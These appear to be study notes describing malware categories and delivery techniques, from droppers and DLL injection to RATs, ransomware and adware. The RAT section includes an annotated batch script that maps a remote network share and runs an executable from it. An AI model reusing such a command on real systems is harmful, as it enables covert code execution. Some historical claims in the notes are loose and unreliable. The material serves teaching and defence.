Malware
Overview
A malware is a software that is detrimental to the operations of the host. In the old days, all malware starts out as a virus, which spreads across a network and replicates only through definite user interaction.
A malware attack is an exploit technique is a specific method by which malware code infects a target host.
- Malware can assert malicous macro into a document file.
- Other malware focused on infecting the memory or other resources.
- Modern malware uses file-less techniques to avoid detection.
PUPs or Potentially Unwanted Programs are softwares that may have negative or undesirable effects.
- Crapware, adware, spyware, bloatware
Fileless Malware
Used to create a process in the system memory without relying on the local file.
- Difficult to detect; leaves very few traces of indicators of compromise.
- Some temporarily write data, but they also erase those artifacts after execution.
Two-stage Deployment
Most modern malware uses a two-stage deployment.
Step 1: Dropper or Downloader
- When a user clicks a malicious link, opens a malicious file, which then installs the malware.
- Usually created as a lightweight shell code that can be executed on a given system.
- Dropper - Initiates/runs malware forms within a payload on an infected host.
- Downloader - Retrieves additional tools after the initial infection by the dropper.
- Shellcode - lightweight code meant to execute an exploit on a given target.
Step 2: Downloader
- Another downloader, installs remote access trojan (RAT).
- For Command and Control on the victimized system.
Actions on Objective
Once the attacker has spread his footprint on your network and they've established a stronghold, he can then transition into the "Action on Objectives" Phase. On thi phase, the attackers can then will execute their primary objectives.
Concealment
Final step of the attack. This will help the threat actor prolong unauthorized access to the system, which can be done by hiding tracks, erasing log files, or hiding any evidence.
Malware Delivery
Common Deployment Techniques
Common techniques to deploy malicious code:
-
Code Injection
- Inserts malicious code into a legitimate process's address space to execute under its context.
-
DLL Sideloading
- Loads a malicious DLL by placing it in a directory where a legitimate application will mistakenly load it.
-
DLL Injection
- Forces a running process to load a malicious DLL, enabling the attacker to control the process.
-
Masquerading
- Disguises malicious files or processes as legitimate ones to avoid detection.
-
Process Hollowing
- Replaces the code of a legitimate process with malicious code while the process is running, allowing the attacker to execute their code under the guise of the legitimate process.
Living off the Land
A strategy adopted by many Advanced Persistent Threats (APTs) and criminal organizations.
- Threat actors exploit standard system tools to perform intrusions.
- Example: manipulating powershell to conduct malicious activities.
Remote Access Trojan (RAT)
A Remote Access Trojan (RAT) is malware that gives an attacker remote control over a victim’s computer. It can silently execute commands, steal data, install other malware, or spy on user activity.
- Earliest version is a testris game which infected with the trojan.
- The game is installed into floppy disks and share between friends.
As an example, the script below shows suspicious behavior often linked to RATs:
## Hides command output from the user
@echo off
## Disguises the script as a normal maintenance task
rem Update system components
## Connects to an external network share without user approval
net use Y: \\192.168.45.100\update_repo /user:update_agent /p:yes
## Runs a potentially malicious executable from the network share
Y:\utilities\update_sync.exe
## Removes the mapped drive to hide activity
net use Y: /delete
The file update_sync.exe** exhibits characteristics typical of a Remote Access Trojan (RAT):
- It's not approved or authorized by security controls
- Communicates with an external IP address
- Executes remote commands on the host system
- Can be used to exfiltrate data or deploy additional malware
Reverse Proxy Backdoor
A reverse proxy backdoor is malware that opens an outbound connection from a victim's system to an attacker's server, bypassing firewalls and NAT.
- Attacker sets up a remote server to accept connections
- Traffic is relayed to internal systems
- Malware connects to that server
- It then waits for commands to proxy requests or move laterally
This backdoor is often hidden in legitimate apps or updates and can be hard to detect, especially if it uses encryption or mimics trusted services.
Ransomware
Ransomware is malicious software that locks or encrypts data and demands payment to restore access.
- Blocks access to a computer or files until the ransom is paid.
- Spreads via phishing emails, malicious attachments, or drive-by downloads.
- Examples: WannaCry, CryptoLocker, Ryuk.
Paying the ransom does not guarantee data recovery and may encourage repeat or broader attacks.
Keylogger
A keylogger is software or hardware that captures every keystroke typed on a device, usually without the user’s knowledge.
- Originally created to help in troubleshooting.
- Captured key strokes are sent to the threat actor.
- Can be installed by malware or physical access to the device.
- Often used as part of spyware or targeted attacks.
Spyware
Spyware is unwanted software that secretly collects user data and monitors activity without consent.
- Tracks browsing habits, keystrokes, or system usage in the background.
- May send data to third parties for financial or surveillance purposes.
- Often bundled with free software or installed via phishing.
- Can degrade performance and pose serious privacy risks.
Spyware can cause a computer to slow down or freeze. It can also cause the mouse pointer to disappear.
Bloatware
Bloatware refers to unnecessary or pre-installed software that consumes system resources without providing value to the user.
- Typically comes preloaded by manufacturers or vendors.
- Slows down system performance and startup time.
- May include trialware, ads, or partner apps that clutter the system.
While not inherently malicious, it can reduce user control and lead to vulnerabilities.
Adware
Adware is software designed to display or inject unwanted ads, often bundled with free programs.
- May redirect browser traffic, show pop-ups
- It can also change homepages/search engines
- Often installed during software downloads.
- Some adware tracks user behavior to serve targeted ads.
Though less harmful than spyware or ransomware, adwares still poses privacy and security concerns.